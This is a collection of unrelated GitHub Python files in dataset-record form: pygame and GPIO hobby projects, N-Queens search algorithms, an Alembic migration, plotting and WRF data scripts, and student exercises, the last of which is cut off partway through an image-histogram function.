line.append({'순위':rank,'albumImage':img, '곡명':title,'가수':artist,'앨범':song})\n\n return line","repo_name":"qomalq/DataAnalysis-Lecture","sub_path":"07.FlaskWeb/melon_unity.py","file_name":"melon_unity.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"33737340135","text":"import pygame\r\nimport random\r\n\r\n# Color List\r\nBLACK = ( 0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\nclass Block(pygame.sprite.Sprite):\r\n \"\"\"\r\n Class for ball.\r\n Derives from the \"Sprite\" class in Pygame.\r\n \"\"\"\r\n\r\n def __init__(self, color, width, height):\r\n \"\"\" Constructor: pass in color and x/y position\r\n \"\"\"\r\n\r\n # Call the parent class\r\n super().__init__()\r\n\r\n # Create an image of the block and fill with a color\r\n # Can also be an image\r\n self.image = pygame.Surface([width, height])\r\n self.image.fill(color)\r\n\r\n # Fetch rect that has dimensions of the image\r\n\r\n # Update position of this object by setting values\r\n # of rect.x and rect.y\r\n self.rect = self.image.get_rect()\r\n\r\n def reset_pos(self):\r\n \"\"\" Reset position to the top of the screen at random x location.\r\n Called by update() or main program loop if collision.\r\n \"\"\"\r\n self.rect.y = random.randrange(-300, -20)\r\n self.rect.x = random.randrange(0, screen_width)\r\n\r\n def update(self):\r\n \"\"\" Called each frame.\"\"\"\r\n\r\n # Move block down one pixel\r\n self.rect.y += 1\r\n if self.rect.y > screen_height:\r\n self.reset_pos()\r\n\r\n# Initialize Pygame\r\npygame.init()\r\n\r\n# Set height and width of the screen\r\nscreen_width = 700\r\nscreen_height = 400\r\nscreen = pygame.display.set_mode([screen_width, screen_height])\r\n\r\n# List of Sprites.\r\n# Each block in program is added to this list.\r\n# List is managed by class called 'Group.'\r\nblock_list = pygame.sprite.Group()\r\n\r\n# This is a list of every sprite:\r\n# All blocks and the player block as well.\r\nall_sprites_list = pygame.sprite.Group()\r\n\r\nfor i in range(50):\r\n # This represents a block\r\n block = Block(BLACK, 20, 15)\r\n\r\n # Set a random location for the block\r\n block.rect.x = random.randrange(screen_width)\r\n block.rect.y = random.randrange(screen_height)\r\n\r\n # Add the block to the list of objects\r\n block_list.add(block)\r\n all_sprites_list.add(block)\r\n\r\n# Create a RED player block\r\nplayer = Block(RED, 20, 15)\r\nall_sprites_list.add(player)\r\n\r\n# Loop until user closes window\r\ndone = False\r\n\r\n# Manage how fast screen updates\r\nclock = pygame.time.Clock()\r\n\r\n# Hide mouse cursor\r\npygame.mouse.set_visible(0)\r\n\r\nscore = 0\r\n\r\n# -------- Main Program Loop ---------\r\nwhile not done:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n done = True\r\n\r\n # Clear the screen\r\n screen.fill(WHITE)\r\n\r\n # Get current position of mouse\r\n pos = pygame.mouse.get_pos()\r\n\r\n # Fetch the x/y coordinates\r\n player.rect.x = pos[0]\r\n player.rect.y = pos[1]\r\n\r\n # Call update() method for all blocks in block_list\r\n block_list.update()\r\n\r\n # Check if player blocks has collided with other blocks\r\n blocks_hit_list = pygame.sprite.spritecollide(player, block_list, False)\r\n\r\n # Check the list of collisions\r\n for block in blocks_hit_list:\r\n score += 1\r\n print(score)\r\n\r\n block.reset_pos()\r\n if score == 100:\r\n print(\"C O N G R A T U L A T I O N S\")\r\n done = True\r\n\r\n # Draw all sprites\r\n 
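# Group.draw() blits each sprite's .image at its .rect; both attributes are\r\n    # set in Block.__init__, so no per-sprite arguments are needed here\r\n    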
all_sprites_list.draw(screen)\r\n\r\n # Limit to 60 frames per second\r\n clock.tick(60)\r\n\r\n # Update screen\r\n pygame.display.flip()\r\n\r\npygame.quit()","repo_name":"allenmattp/Arcade","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":3387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12207373683","text":"import random\nimport heapq\nimport sys\n\nsys.setrecursionlimit(10000)\n\n\nclass State:\n def __init__(self, queens, steps=0):\n self.queens = queens\n self.gn = steps\n\n def __lt__(self, other):\n return self.gn < other.gn\n\n def __hash__(self):\n return hash(tuple(self.queens))\n\n def __eq__(self, other):\n if isinstance(other, State):\n return self.queens == other.queens\n return False\n @staticmethod\n def random_state(n):\n if not isinstance(n, int):\n raise TypeError(\"n must be an integer\")\n queens = [random.randint(1, n) for _ in range(n)]\n return State(queens)\n\n def IsGoal(self):\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n return False\n return True\n\n def SuccessorFunction(self):\n states = set()\n n = len(self.queens)\n for i in range(n):\n for j in range(1, n + 1):\n if j != self.queens[i]:\n new_queens = list(self.queens)\n new_queens[i] = j\n successor_state = State(new_queens, self.gn + 1)\n states.add(successor_state)\n return list(states)\n\n def heuristic(self):\n attacks = 0\n n = len(self.queens)\n for i in range(n):\n for j in range(i + 1, n):\n if self.queens[i] == self.queens[j] or abs(self.queens[i] - self.queens[j]) == j - i:\n attacks += 1\n return attacks\n\n def cost(self):\n return self.gn\n\n\ndef BFS(initial_state):\n steps = 0\n FIFO = [(initial_state, 0)]\n visited = {initial_state}\n search_cost = 0\n max_fringe_size = 1\n\n while FIFO:\n state, steps = FIFO.pop(0)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n FIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(FIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef DFS(initial_state):\n LIFO = [(initial_state, 0)]\n visited = {initial_state}\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while LIFO:\n state, steps = LIFO.pop()\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited:\n visited.add(successor_state)\n LIFO.append((successor_state, steps + 1))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(LIFO))\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef greedy(initial_state):\n heap = [(initial_state.heuristic(), initial_state)]\n visited = set()\n steps = 0\n search_cost = 0\n max_fringe_size = 1\n\n while heap:\n _, state = heapq.heappop(heap)\n visited.add(state)\n\n if state.IsGoal():\n return state, steps, search_cost, max_fringe_size\n\n for successor_state in state.SuccessorFunction():\n if successor_state not in visited and successor_state not in [s for _, s in heap]:\n heapq.heappush(heap, (successor_state.heuristic(), successor_state))\n search_cost += 1\n max_fringe_size = max(max_fringe_size, len(heap))\n\n steps += 1\n\n return None, steps, search_cost, max_fringe_size\n\n\ndef 
Astar(initial_state):\n    heap = [(initial_state.heuristic() + initial_state.cost(), initial_state)]\n    visited = set()\n    steps = 0\n    search_cost = 0\n    max_fringe_size = 1\n\n    while heap:\n        _, state = heapq.heappop(heap)\n        visited.add(state)\n\n        if state.IsGoal():\n            return state, steps, search_cost, max_fringe_size\n\n        for successor_state in state.SuccessorFunction():\n            if successor_state not in visited and successor_state not in [s for _, s in heap]:\n                heapq.heappush(heap, (successor_state.heuristic() + successor_state.cost(), successor_state))\n                search_cost += 1\n                max_fringe_size = max(max_fringe_size, len(heap))\n\n        steps += 1\n\n    return None, steps, search_cost, max_fringe_size\n\n\ndef PrintBoard(queens):\n    n = len(queens)\n    for i in range(n):\n        print(' ---' * n)\n        for j in range(1, n + 1):\n            p = 'Q' if queens[i] == j else ' '\n            print('| %s ' % p, end='')\n        print('|')\n    print(' ---' * n)\n\ndef printinfo(steps, search_cost, max_fringe_size):\n    print(\"Total number of steps to reach a solution (solution cost):\", steps)\n    print(\"Total number of nodes generated before reaching a solution (search cost):\", search_cost)\n    print(\"Maximum size of the fringe:\", max_fringe_size)\n","repo_name":"1hexk/N-Queen-Problem","sub_path":"N_queen_problem.py","file_name":"N_queen_problem.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7806140946","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 2017-12-20\n@author: whenever77\nubuntu 14\n\nDisplay and save the loss curve while training is running.\n\nThe loss file holds one value per line, e.g.:\n4.578215\n3.984914\n...\n3.718668\n\nRun it with:\npython show_loss.py '/home/data/pytorch_out/'\n\nThe PNG is saved as loss_month_day_hours_minutes.png\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport time\nimport sys\n\n\n# dir is the training directory (the one containing loss.txt); edit it as needed\ndir = \"/home/data/pytorch_out/\"\n\n\n# if a command-line argument was given, sys.argv[1] overrides the default path\nif len(sys.argv) >= 2:\n    try:\n        print(\"--------------------------------\")\n        print(sys.argv[1].split('/')[-2])\n        print(\"--------------------------------\")\n        dir = sys.argv[1]\n    except BaseException as e:\n        print('error:\\t')\n        print(e)\nelse:\n    print(\"--------------------------------\")\n    print(dir.split('/')[-2])\n    print(\"--------------------------------\")\n\n\n\n# path of the loss file\npath = os.path.join(dir, 'loss.txt')\n\n# use the current time as a filename suffix, so the loss curve can be saved\n# at any point during training\ntime_tmp = list(time.localtime())[1:5]\ntime_now = \"_\".join(str(i) for i in time_tmp)\n\n# if the path is wrong, print the error\ntry:\n    dataloss = np.loadtxt(path)\n    plt.plot(dataloss)\n    save_path = str(dir) + 'loss_' + str(time_now) + '.png'\n    plt.savefig(save_path)\n    plt.show()\nexcept BaseException as e:\n    # print(\"--------------------------------\")\n    print('error:\\t')\n    print(e)\n\n","repo_name":"whenever77/Python-study","sub_path":"show_loss.py","file_name":"show_loss.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1900205692","text":"\"\"\"empty message\n\nRevision ID: 3a24472d1754\nRevises: 762402052503\nCreate Date: 2021-04-08 04:13:23.757308\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = '3a24472d1754'\ndown_revision = '762402052503'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.create_table('personajes',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('planetas',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=120), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('name')\n )\n op.create_table('usuarios',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=120), nullable=False),\n sa.Column('last_name', sa.String(length=120), nullable=False),\n sa.Column('email', sa.String(length=120), nullable=False),\n sa.Column('password', sa.String(length=80), nullable=False),\n sa.Column('is_active', sa.Boolean(), nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('favorites_characters',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('character_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['character_id'], ['personajes.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.create_table('favorites_planets',\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('planet_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['planet_id'], ['planetas.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['usuarios.id'], )\n )\n op.drop_index('email', table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', mysql.INTEGER(), autoincrement=True, nullable=False),\n sa.Column('email', mysql.VARCHAR(length=120), nullable=False),\n sa.Column('password', mysql.VARCHAR(length=80), nullable=False),\n sa.Column('is_active', mysql.TINYINT(display_width=1), autoincrement=False, nullable=False),\n sa.CheckConstraint('(`is_active` in (0,1))', name='user_chk_1'),\n sa.PrimaryKeyConstraint('id'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('email', 'user', ['email'], unique=True)\n op.drop_table('favorites_planets')\n op.drop_table('favorites_characters')\n op.drop_table('usuarios')\n op.drop_table('planetas')\n op.drop_table('personajes')\n # ### end Alembic commands ###\n","repo_name":"mzunigau/StarWarsAPI-Flask","sub_path":"migrations/versions/3a24472d1754_.py","file_name":"3a24472d1754_.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15457991132","text":"from random import randint\n\n\nuser_board = [[' '] * 8 for x in range(8)]\n\ncomputer_board = [[' '] * 8 for x in range(8)]\n\nletters_to_numbers = {\n 'A': 0,\n 'B': 1,\n 'C': 2,\n 'D': 3,\n 'E': 4,\n 'F': 5,\n 'G': 6,\n 'H': 7,\n}\n\ndef print_board(board):\n print('A B C D E F G H')\n print('----------------')\n row_number = 1\n for row in board:\n print(\"%d|%s|\" % (row_number, \"|\".join(row)))\n row_number += 1\n\ndef place_ships(board):\n for ship in range(8):\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n while board[ship_row][ship_column] == 'x':\n ship_row, ship_column = randint(0, 7), randint(0, 7)\n board[ship_row][ship_column] = 'X'\n\ndef play_game():\n pass\n\ndef valid_coordinates():\n row = input(\"Enter the row of the ship: \").upper()\n while row not in \"12345678\":\n print(\"Please select a valid number between 1 and 
8 inclusive\")\n row = input(\"Enter the row of the ship: \").upper()\n column = input(\"Enter the column of the ship: \").upper()\n while column not in \"ABCDEFGH\":\n print(\"Please choose a valud option between A and H inclusive\")\n column = input(\"Enter the column of the ship: \").upper()\n return int(row) - 1, letters_to_numbers[column]\n \ndef ships_sunk(board):\n count = 0\n for row in board:\n for column in row:\n if column == \"X\":\n count += 1\n return count\n\ndef new_game():\n pass\n\n\n","repo_name":"Johncci/battleship-down","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28300473465","text":"import pygame\nfrom gpiozero import Button, LEDBoard\nfrom signal import pause\n\npygame.init()\n\nbutton_1 = Button(14)\nbutton_2 = Button(18)\nbutton_3 = Button(9)\nbutton_4 = Button(10)\n\nled = LEDBoard(11,22,27,17)\n\n\nsound1 = pygame.mixer.Sound('samples/drum_tom_mid_hard.wav')\nsound2 = pygame.mixer.Sound('samples/drum_splash_hard.wav')\nsound3 = pygame.mixer.Sound('samples/drum_cowbell.wav')\nsound4 = pygame.mixer.Sound('samples/drum_cymbal_closed.wav')\n\n\nbutton_1.when_pressed = sound1.play\nbutton_2.when_pressed = sound2.play\nbutton_3.when_pressed = sound3.play\nbutton_4.when_pressed = sound4.play\n\ndef button_1_on() :\n led.value = (1,0,0,0)\n \ndef button_2_on() :\n led.value = (0,1,0,0)\n \ndef button_3_on() :\n led.value = (0,0,1,0)\n \ndef button_4_on() :\n led.value = (0,0,0,1)\n \n\nwhile True:\n if button_1.is_pressed:\n button_1_on()\n \n if button_2.is_pressed:\n button_2_on() \n \n if button_3.is_pressed:\n button_3_on()\n\n if button_4.is_pressed:\n button_4_on()\n","repo_name":"n3rdz/gpio-musicbox","sub_path":"musicbox.py","file_name":"musicbox.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18774615949","text":"import matplotlib.pyplot as plt\nimport json\nimport math\n\nimport matplotlib as mil\nmil.use('TkAgg')\n\n\nclass Agent:\n\n def __init__(self, position, **agent_attributes):\n self.position = position\n for attr_name, attr_value in agent_attributes.items():\n setattr(self, attr_name, attr_value)\n\n\nclass Position:\n def __init__(self, longitude_degrees, latitude_degrees):\n # We store the degree values, but we will be mostly using radians\n # because they are much more convenient for computation purposes.\n\n # assert : Lève une exception si renvoie False\n assert -180 <= longitude_degrees <= 180\n self.longitude_degrees = longitude_degrees\n\n assert -90 <= latitude_degrees <= 90\n self.latitude_degrees = latitude_degrees\n\n @property\n def longitude(self):\n # Longitude in radians\n return self.longitude_degrees * math.pi / 180\n\n @property\n def latitude(self):\n # Latitude in radians\n return self.latitude_degrees * math.pi / 180\n\n\nclass Zone:\n \"\"\"\n A rectangular geographic area bounded by two corners. 
The corners can\n    be top-left and bottom right, or top-right and bottom-left so you should be\n    careful when computing the distances between them.\n    \"\"\"\n    ZONES = []\n\n    # Class attributes (they would be constants outside the class); accessed as cls.WIDTH_DEGREES\n    MIN_LONGITUDE_DEGREES = -180\n    MAX_LONGITUDE_DEGREES = 180\n    MIN_LATITUDE_DEGREES = -90\n    MAX_LATITUDE_DEGREES = 90\n    WIDTH_DEGREES = 1 # degrees of longitude\n    HEIGHT_DEGREES = 1 # degrees of latitude\n    EARTH_RADIUS_KILOMETERS = 6371\n\n    # Instance attributes go in __init__\n    def __init__(self, corner1, corner2):\n        self.corner1 = corner1\n        self.corner2 = corner2\n        self.inhabitants = []\n\n    @property\n    def population(self):\n        return len(self.inhabitants)\n\n    @property\n    def width(self):\n        # Note that here we access the class attribute via \"self\" and it\n        # doesn't make any difference\n        return abs(self.corner1.longitude - self.corner2.longitude) * self.EARTH_RADIUS_KILOMETERS\n\n    @property\n    def height(self):\n        return abs(self.corner1.latitude - self.corner2.latitude) * self.EARTH_RADIUS_KILOMETERS\n\n    @property\n    def area(self):\n        return self.height * self.width\n\n    def population_density(self):\n        return self.population / self.area\n\n    def average_agreeableness(self):\n        if not self.inhabitants:\n            return 0\n        # agreeableness = []\n        # for inhabitant in self.inhabitants:\n        #     agreeableness.append(inhabitant.agreableness)\n        # return sum(agreeableness) / self.population\n        return sum([inhabitant.agreeableness for inhabitant in self.inhabitants]) / self.population\n\n    def add_inhabitant(self, inhabitant):\n        self.inhabitants.append(inhabitant)\n\n    def contains(self, position):\n        \"\"\"Return True if the zone contains this position\"\"\"\n        return position.longitude >= min(self.corner1.longitude, self.corner2.longitude) and \\\n            position.longitude < max(self.corner1.longitude, self.corner2.longitude) and \\\n            position.latitude >= min(self.corner1.latitude, self.corner2.latitude) and \\\n            position.latitude < max(\n                self.corner1.latitude, self.corner2.latitude)\n\n    @classmethod\n    def find_zone_that_contains(cls, position):\n        if not cls.ZONES:\n            # Initialize zones automatically if necessary\n            cls._initialize_zones()\n\n        # Compute the index in the ZONES array that contains the given position\n        longitude_index = int(\n            (position.longitude_degrees - cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES)\n        latitude_index = int(\n            (position.latitude_degrees - cls.MIN_LATITUDE_DEGREES) / cls.HEIGHT_DEGREES)\n        longitude_bins = int((cls.MAX_LONGITUDE_DEGREES -\n                              cls.MIN_LONGITUDE_DEGREES) / cls.WIDTH_DEGREES) # 180-(-180) / 1\n        zone_index = latitude_index * longitude_bins + longitude_index\n\n        # Just checking that the index is correct\n        zone = cls.ZONES[zone_index]\n        assert zone.contains(position)\n\n        return zone\n\n    @classmethod\n    def _initialize_zones(cls):\n        for latitude in range(cls.MIN_LATITUDE_DEGREES, cls.MAX_LATITUDE_DEGREES, cls.HEIGHT_DEGREES):\n            for longitude in range(cls.MIN_LONGITUDE_DEGREES, cls.MAX_LONGITUDE_DEGREES, cls.WIDTH_DEGREES):\n                bottom_left_corner = Position(longitude, latitude)\n                top_right_corner = Position(\n                    longitude + cls.WIDTH_DEGREES, latitude + cls.HEIGHT_DEGREES)\n                zone = Zone(bottom_left_corner, top_right_corner)\n                cls.ZONES.append(zone)\n\n\nclass BaseGraph:\n\n    def __init__(self):\n        self.title = \"Your graph title\"\n        self.x_label = \"X-axis label\"\n        self.y_label = \"Y-axis label\"\n        self.show_grid = True\n\n    def show(self, zones):\n        # x_values = gather only x_values from our zones\n        # y_values = gather only 
y_values from our zones\n x_values, y_values = self.xy_values(zones)\n plt.plot(x_values, y_values, '.')\n plt.xlabel(self.x_label)\n plt.ylabel(self.y_label)\n plt.title(self.title)\n plt.grid(self.show_grid)\n plt.show()\n\n def xy_values(self, zones):\n raise NotImplementedError\n\n\nclass AgreeablenessGraph(BaseGraph):\n\n def __init__(self):\n # Call base constructor\n super(AgreeablenessGraph, self).__init__()\n # super().__init__()\n self.title = \"Nice people live in the countryside\"\n self.x_label = \"population density\"\n self.y_label = \"agreeableness\"\n\n def xy_values(self, zones):\n x_values = [zone.population_density() for zone in zones]\n y_values = [zone.average_agreeableness() for zone in zones]\n return x_values, y_values\n\n\ndef main():\n # Zone.initialize_zones()\n for agent_attributes in json.load(open(\"agents-100k.json\")):\n latitude = agent_attributes.pop(\"latitude\")\n longitude = agent_attributes.pop(\"longitude\")\n position = Position(longitude, latitude)\n agent = Agent(position, **agent_attributes)\n # print(agent.agreeableness)\n zone = Zone.find_zone_that_contains(position)\n zone.add_inhabitant(agent)\n # print(\"Zone population: \", zone.population)\n # print(zone.average_agreeableness())\n\n agreeableness_graph = AgreeablenessGraph()\n agreeableness_graph.show(Zone.ZONES)\n\n\nmain()\n\n# agent = Agent(agent_attributes)\n# print(agent.agreeableness)\n# print(agent.neuroticism)\n","repo_name":"jlum85/POO-Python","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"45923155735","text":"# get forecast_time attrs from dset to use in interpolation\ndef open_ds( fn, variable ):\n ''' cleanly read variable/close a single hourly netcdf '''\n import xarray as xr\n ds = xr.open_dataset( fn, autoclose=True )\n out = ds[ variable ].copy()\n ds.close()\n return out\ndef list_files( dirname ):\n '''\n list the files and split the filenames into their descriptor parts and \n return dataframe of elements and filename sorted by:['year', 'month', 'day', 'hour']\n '''\n import os\n import pandas as pd\n\n files = [ get_month_day( os.path.join(r, fn)) for r,s,files in os.walk( dirname ) \n for fn in files if os.path.split(r)[-1].isdigit() and fn.endswith( '.nc' )\n and '-*.nc' not in fn and 'old' not in r and 'test' not in r ]\n\n files_df = pd.DataFrame( files )\n return files_df.sort_values( ['year', 'month', 'day', 'hour'] ).reset_index()\ndef get_month_day( fn ):\n dirname, basename = os.path.split( fn )\n year, month, day_hour = basename.split('.')[-2].split('-')\n day, hour = day_hour.split( '_' )\n folder_year = dirname.split('/')[-1]\n return {'fn':fn, 'year':year, 'folder_year':folder_year,'month':month, 'day':day, 'hour':hour}\ndef get_forecast_time( fn ):\n return open_ds( fn, variable='PCPT' ).attrs['forecast_time']\ndef get_file_attrs( fn ):\n try:\n fn_args = get_month_day( fn )\n fn_args.update( forecast_time=get_forecast_time( fn ) )\n except:\n # if there is an issue... 
dont fail, do this...\n nodata = -9999\n fn_args = {'fn':fn, 'year':nodata, 'folder_year':nodata,'month':nodata, 'day':nodata, 'hour':nodata, 'forecast_time':nodata}\n return fn_args\n\nif __name__ == '__main__':\n import xarray as xr\n import pandas as pd\n import multiprocessing as mp\n import os\n \n # setup args\n # base_path = '/storage01/pbieniek/ccsm/hist/hourly'\n base_path = '/storage01/pbieniek/ccsm/rcp85/hourly'\n # base_path = '/storage01/pbieniek/erain/hourly'\n # base_path = '/storage01/rtladerjr/hourly'\n \n # fn_list = [ os.path.join( r, fn ) for r,s,files in os.walk( base_path ) \n # if 'oldstuff' not in r for fn in files if fn.endswith( '.nc' ) \n # and 'test' not in fn and '-*.nc' not in fn ]\n \n fn_list = list_files( base_path )\n # drop unneeded duplicates\n fn_list = fn_list[ fn_list.folder_year == fn_list.year ]\n print( 'number of files: {}'.format(len( fn_list )) )\n\n ncpus = 32\n output_path = '/workspace/Shared/Tech_Projects/wrf_data/project_data/wrf/docs'\n group = 'ccsm_rcp85'\n # group = 'erain'\n # group = 'gfdl_rcp85'\n\n pool = mp.Pool( ncpus )\n print( 'start multiprocessing' )\n out = [ pool.map( get_file_attrs, fnl['fn'] ) for group, fnl in fn_list.groupby( 'year' ) ]\n out = [ j for i in out for j in i ]\n print( 'multiprocessing complete' )\n pool.close()\n pool.join()\n\n print( 'df' )\n df = pd.DataFrame( out )\n output_filename = os.path.join( output_path, 'WRFDS_forecast_time_attr_{}.csv'.format( group ) )\n print( 'writing to disk' )\n df.to_csv( output_filename, sep=',' )\n","repo_name":"ua-snap/wrf_utils","sub_path":"archive/snap_wrf_data_prep/pipeline/get_date_forecast_time_from_raw_hourly.py","file_name":"get_date_forecast_time_from_raw_hourly.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"27583150160","text":"def get_and_strip_number(s):\n # replace this comment and the next statement with your function body\n return 0, ''\n\ndef get_and_strip_word(s):\n # replace this comment and the next statement with your function body\n return '', ''\n \ndef pad_words(s, num_words, final_len):\n if num_words <= 1: # best we can do is fill out the line with spaces\n return s + ((final_len - len(s))*' ')\n\n # there are at least 2 words, so at least one pigeon hole to fill (with spaces)\n num_pigeon_holes = num_words - 1 # the buckets (pigeon holes) are between words\n num_pigeons = final_len - (len(s) - num_pigeon_holes) # my pigeons are spaces\n pad_num = num_pigeons // num_pigeon_holes\n extra_num = num_pigeons % num_pigeon_holes # number of holes that get an extra pigeon\n working_str = ''\n \n # take care of the first num_pigeon_holes - extra_num holes\n for i in range(num_pigeon_holes - extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + (pad_num * ' ') # insert pad_num spaces\n\n # take care of the last extra_num holes\n for i in range(extra_num):\n word, s = get_and_strip_word(s)\n working_str += word + ((pad_num + 1) * ' ')\n\n working_str += s\n return working_str\n\nsentence = \"This is a test.\"\nfilled_sentence = pad_words(sentence, 4, 20)\nprint(filled_sentence)\n\nfilled_sentence = pad_words(\"What?\", 1, 30)\nprint(filled_sentence)\n\nprint(pad_words(\"What's up?\", 2, 
30))\n\n\n\n\n","repo_name":"Trent-Farley/All-Code","sub_path":"Python1/lab_4_files/python_tutor_exercise.py","file_name":"python_tutor_exercise.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"14803697131","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom skimage.color import rgb2gray\r\nimport skimage.color\r\nfrom imageio import imread\r\n\r\n# the matrix to transfer from rgb to yiq and vice versa\r\nCONSTANT_MATRIX = np.array([[0.299, 0.587, 0.114],\r\n [0.596, -0.275, -0.321],\r\n [0.212, -0.523, 0.311]])\r\n\r\n\r\ndef read_image(filename, representation):\r\n \"\"\"\r\n Gets a filename and an int representing which color image we want(greyscale or rgb)\r\n :param filename: A string\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: A matrix representing the image\r\n \"\"\"\r\n im = imread(filename)\r\n im_float = im.astype(np.float64)\r\n im_float /= 255\r\n if representation == 1 and len(im.T) == 3:\r\n return rgb2gray(im_float)\r\n\r\n else:\r\n return im_float\r\n\r\n\r\ndef imdisplay(filename, representation):\r\n \"\"\"\r\n Gets an image and shows it on the screen\r\n :param filename: A string ( name of the image)\r\n :param representation: An int. 1 for greyscale and 2 for rgb\r\n :return: None\r\n \"\"\"\r\n image = read_image(filename, representation)\r\n plt.imshow(image, cmap=plt.cm.gray)\r\n plt.axis('off')\r\n plt.show()\r\n\r\n\r\ndef rgb2yiq(imRGB):\r\n \"\"\"\r\n changing the color from rgb to yiq using\r\n the constant matrix I was given\r\n :param imRGB: A matrix that is shaped (x*y*3)\r\n :return: a yiq matrix\r\n \"\"\"\r\n return np.dot(imRGB, CONSTANT_MATRIX.T)\r\n\r\n\r\ndef yiq2rgb(imYIQ):\r\n \"\"\"\r\n changing the color from yiq to rgb using\r\n the constant matrix I was given\r\n :param imYIQ: A matrix that is shaped (x*y*3)\r\n :return: a rgb matrix\r\n \"\"\"\r\n\r\n return np.dot(imYIQ, (np.linalg.inv(CONSTANT_MATRIX)).T)\r\n\r\n\r\ndef histogram_image(image):\r\n \"\"\"\r\n This is the helper function for histogram equalizer that differentiates\r\n greyscale image from rgb\r\n :param image: A matrix representing the image\r\n :return: if the image is rgb then returns the histogram for y and True\r\n else returns the histogram for the picture and False\r\n \"\"\"\r\n is_rgb = False\r\n if len(image.T) == 3: # check to see if the image is rgb\r\n image = rgb2yiq(image)\r\n is_rgb = True\r\n\r\n original_hist = None\r\n if is_rgb:\r\n y = image[:, :, 0]\r\n y *= 255\r\n y = np.round(y)\r\n original_hist, axis = np.histogram(y, 256, (0, 255))\r\n\r\n if not is_rgb:\r\n image = (image*255).round().astype(np.uint8)\r\n original = image\r\n original_hist, axis = np.histogram(original, 256, (0, 255))\r\n\r\n return original_hist, is_rgb\r\n\r\n\r\ndef histogram_equalize(im_orig):\r\n \"\"\"\r\n Gets a Matrix of an image and equalizes the histogram\r\n :param im_orig: A matrix representing the image\r\n :return: The new equalized image, the original histogram, the new histogram\r\n \"\"\"\r\n original = im_orig.copy()\r\n original_hist, is_rgb = histogram_image(original)\r\n # if is_rgb:\r\n original = (original*255).round().astype(np.uint8)\r\n cumulative_hist = np.cumsum(original_hist)\r\n # find m (first grey scale that is non zero)\r\n non_zeroes = np.nonzero(cumulative_hist)\r\n m = non_zeroes[0][0]\r\n\r\n T = 255 * ((cumulative_hist - cumulative_hist[m]) / (cumulative_hist[-1] - 
